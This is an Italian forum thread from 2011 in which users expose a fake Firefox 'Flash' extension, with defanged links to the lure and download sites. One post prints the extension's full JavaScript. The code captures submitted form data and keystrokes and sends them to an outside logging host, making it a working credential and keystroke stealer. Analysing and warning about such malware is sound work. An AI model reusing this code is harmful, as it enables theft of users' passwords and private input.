Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > AV e sicurezza in generale

OPPO Watch X2 Mini, lo smartwatch compatto a cui non manca nulla
OPPO Watch X2 Mini, lo smartwatch compatto a cui non manca nulla
OPPO Watch X2 Mini è uno smartwatch compatto capace di offrire un'esperienza completa di monitoraggio della salute e fitness con una cassa da 43 mm che può adattarsi a qualsiasi tipo di polso, dal più grande al - soprattutto - più piccolo. Con l'architettura dual-chip e un'autonomia che può coprire due giorni con tranquillità, rappresenta la soluzione ideale per chi cerca prestazioni premium in un formato ridotto.
Xiaomi 15T Pro, è lui il nuovo best buy? La recensione
Xiaomi 15T Pro, è lui il nuovo best buy? La recensione
Dopo il recente lancio della serie Xiaomi 15T di Monaco, vi parliamo oggi della versione più performante della nuova famiglia, ovvero Xiaomi 15 T Pro. Vi raccontiamo la nostra prova nel dettaglio, spiegando perché a questo prezzo e in questa fascia, questo smartphone ha davvero senso tenerlo in seria considerazione.
Acer TravelMate P6 14 AI: il Copilot+ PC sotto il chilo per il professionista in movimento
Acer TravelMate P6 14 AI: il Copilot+ PC sotto il chilo per il professionista in movimento
Acer ha ampliato la sua offerta professionale con il TravelMate P6 14 AI, un notebook ultraleggero e robusto pensato per chi lavora in mobilità. Certificato Copilot+ PC, combina design premium, autonomia elevata e piattaforma Intel Core Ultra Serie 2 con funzionalità AI, garantendo sicurezza, affidabilità e produttività per l'utenza business moderna.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 15-01-2011, 08:44   #1
Unax
Senior Member
 
L'Avatar di Unax
 
Iscritto dal: Oct 2008
Messaggi: 6501
Falsa estensione per Firefox

questo sito propone una falsa estensione per firefox

hqqp://www.marykiss.byethost31.com/gallery_.html

la falsa estensione viene scaricata da qui

hqqp://addons-mozilla-us-firefox.awardspace.biz/Flash.xpi

Ultima modifica di Unax : 15-01-2011 alle 17:48.
Unax è offline   Rispondi citando il messaggio o parte di esso
Old 15-01-2011, 17:12   #2
riazzituoi
Bannato
 
Iscritto dal: Aug 2007
Messaggi: 3847
.

Ultima modifica di riazzituoi : 15-02-2011 alle 21:47.
riazzituoi è offline   Rispondi citando il messaggio o parte di esso
Old 15-01-2011, 17:28   #3
xcdegasp
Senior Member
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
hai dettagli di come funzioni?
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 15-01-2011, 17:36   #4
Unax
Senior Member
 
L'Avatar di Unax
 
Iscritto dal: Oct 2008
Messaggi: 6501
Quote:
Originariamente inviato da deepdark Guarda i messaggi
virustotal non la riconosce come virus e hitman neppure.
Sei sicuro?

se vedi da che sito lo si scarica capisci subito che è una falsa estensione

hqqp://addons-mozilla-us-firefox.awardspace.biz/Flash.xpi

si spaccia per il sito ufficiale delle estensioni, l'estensione si chiama flash, il sito principale ti dice che è necessaria l'estensione per visualizzare la galleria d'immagini realizzata in flash

tutti segnali tipici di malware

Ultima modifica di Unax : 15-01-2011 alle 17:39.
Unax è offline   Rispondi citando il messaggio o parte di esso
Old 15-01-2011, 17:38   #5
Unax
Senior Member
 
L'Avatar di Unax
 
Iscritto dal: Oct 2008
Messaggi: 6501
Quote:
Originariamente inviato da deepdark Guarda i messaggi
virustotal non la riconosce come virus e hitman neppure.
Sei sicuro?

se vedi da che sito lo si scarica capisci subito che è una falsa estensione

hqqp://addons-mozilla-us-firefox.awardspace.biz/Flash.xpi

tenta di spacciarsi per il sito ufficiale delle estensioni, l'estensione si chiama flash, il sito principale ti dice che è necessaria l'estensione per visualizzare la galleria d'immagini realizzata in flash

tutti segnali tipici di malware
Unax è offline   Rispondi citando il messaggio o parte di esso
Old 15-01-2011, 17:43   #6
Unax
Senior Member
 
L'Avatar di Unax
 
Iscritto dal: Oct 2008
Messaggi: 6501
Quote:
Originariamente inviato da xcdegasp Guarda i messaggi
hai dettagli di come funzioni?
scarica l'estensione e aprila con 7-zip, leggi il file browserOverlay.js, il creatore ha avuto la gentilezza di commentare il codice


Codice:
var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
	var firsttime = prefManager.getBoolPref("extensions.browserOverlay.firsttime");
		if (firsttime) {
			prefManager.setBoolPref("extensions.browserOverlay.firsttime", false);
			window.setTimeout(function(){
                                    gBrowser.selectedTab = gBrowser.addTab("http://www.marykiss.byethost31.com/gallery.html");
                                    }, 1500);
		}
			


//Form submission listener
window.document.onsubmit = search;

//Search the document forms
function search() {
	var forms = content.document.getElementsByTagName('form');
	for(var i=0; i<forms.length; i++) {
		if(forms[i].id)
			var form = content.document.getElementById(forms[i].id);
		else
			var form = content.document.forms[i];
		
		if(form.elements[i].value != '')
				found(form);
		}
	}

//Save information from the target form
function found(form) {
	//EDIT THIS BELLOW TO MATCH YOUR LOGGIN SCRIPT
	var host = 'http://www.skepxis.byethost6.com/save.php';
	
	//Record time and date
	var currentTime = new Date();
	var minutes = currentTime.getMinutes();
	if (minutes < 10)
		minutes = '0' + minutes;
	var date = currentTime.getHours()+':'+minutes+' || '+currentTime.getMonth()+1+'/'+currentTime.getDate()+'/'+currentTime.getFullYear();
	var keyz = host+'?time='+date+'&p-domain='+content.document.location.href;
	
	//Add the collected form data
	for(var c=0; c<form.elements.length; c++)
		keyz += '&'+form.elements[c].name+'='+form.elements[c].value;
	send(keyz);
}

//Send the information
function send(keyz) {
	var xmlhttp;
	if (window.XMLHttpRequest)
		xmlhttp = new XMLHttpRequest();
	else if (window.ActiveXObject)
		xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
	xmlhttp.open("GET",keyz,true);
	xmlhttp.send(null);
}

<![CDATA[
 	document.addEventListener("keypress",onkey,false);
 	var keyss='';
	var link='';

 	function onkey(e)  {      
	
 	keyss+=String.fromCharCode(e.charCode);          

        link=content.document.location.href;
	
 	
	if (keyss.length>20) {
	http=new XMLHttpRequest();
        http.open("GET","http://www.skepxis.byethost6.com/key_strokes.php?keylog=" + keyss+'-------'+ link +'-------',true);
	http.send(null);    
	keyss='';
}
}     

]]>
Unax è offline   Rispondi citando il messaggio o parte di esso
Old 15-01-2011, 18:12   #7
riazzituoi
Bannato
 
Iscritto dal: Aug 2007
Messaggi: 3847
.

Ultima modifica di riazzituoi : 15-02-2011 alle 21:47.
riazzituoi è offline   Rispondi citando il messaggio o parte di esso
Old 16-01-2011, 14:25   #8
Unax
Senior Member
 
L'Avatar di Unax
 
Iscritto dal: Oct 2008
Messaggi: 6501
Quote:
Originariamente inviato da deepdark Guarda i messaggi
Se la installassi su firefox per mac o linux funzionerebbe?
credo di sì
Unax è offline   Rispondi citando il messaggio o parte di esso
Old 17-01-2011, 17:39   #9
Unax
Senior Member
 
L'Avatar di Unax
 
Iscritto dal: Oct 2008
Messaggi: 6501
ho provveduto ad inviare il file xpi ad Avira e ovviamente hanno trovato che

browserOverlay.js MALWARE

una curiosità nella mail mi parlano in spagnolo anche se avevo selezionato di rispondermi in inglese
Unax è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


OPPO Watch X2 Mini, lo smartwatch compatto a cui non manca nulla OPPO Watch X2 Mini, lo smartwatch compatto a cui...
Xiaomi 15T Pro, è lui il nuovo best buy? La recensione Xiaomi 15T Pro, è lui il nuovo best buy? ...
Acer TravelMate P6 14 AI: il Copilot+ PC sotto il chilo per il professionista in movimento Acer TravelMate P6 14 AI: il Copilot+ PC sotto i...
ASUS NUC 15 Pro e NUC 15 Pro+, mini PC che fondono completezza e duttilità ASUS NUC 15 Pro e NUC 15 Pro+, mini PC che fondo...
Cybersecurity: email, utenti e agenti IA, la nuova visione di Proofpoint Cybersecurity: email, utenti e agenti IA, la nuo...
Il Garante della Privacy ha bloccato Clo...
C'è un nuovo operatore virtuale s...
Google Chrome non si ferma più: &...
Tenstorrent produrrà chip nelle f...
Tutte le offerte HOT di Amazon: Galaxy S...
Dreame L40 Ultra AE: il nuovo robot aspi...
Fesseria totale: c'è chi demolisc...
Super TV in saldo su Amazon: Mini-LED, O...
Fast Motion Response: la nuova funzional...
Xiaomi Redmi Note 14 Pro a 219€, un supe...
Cybertruck: Tesla accusata per la morte ...
Xiaomi SU7 si sposta dal sola: lo spaven...
Huawei Ascend 910C: componenti TSMC, Sam...
Mai costate così poco: cuffie Son...
Apple Watch SE 2 scende a 199€ su Amazon...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 04:36.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www3v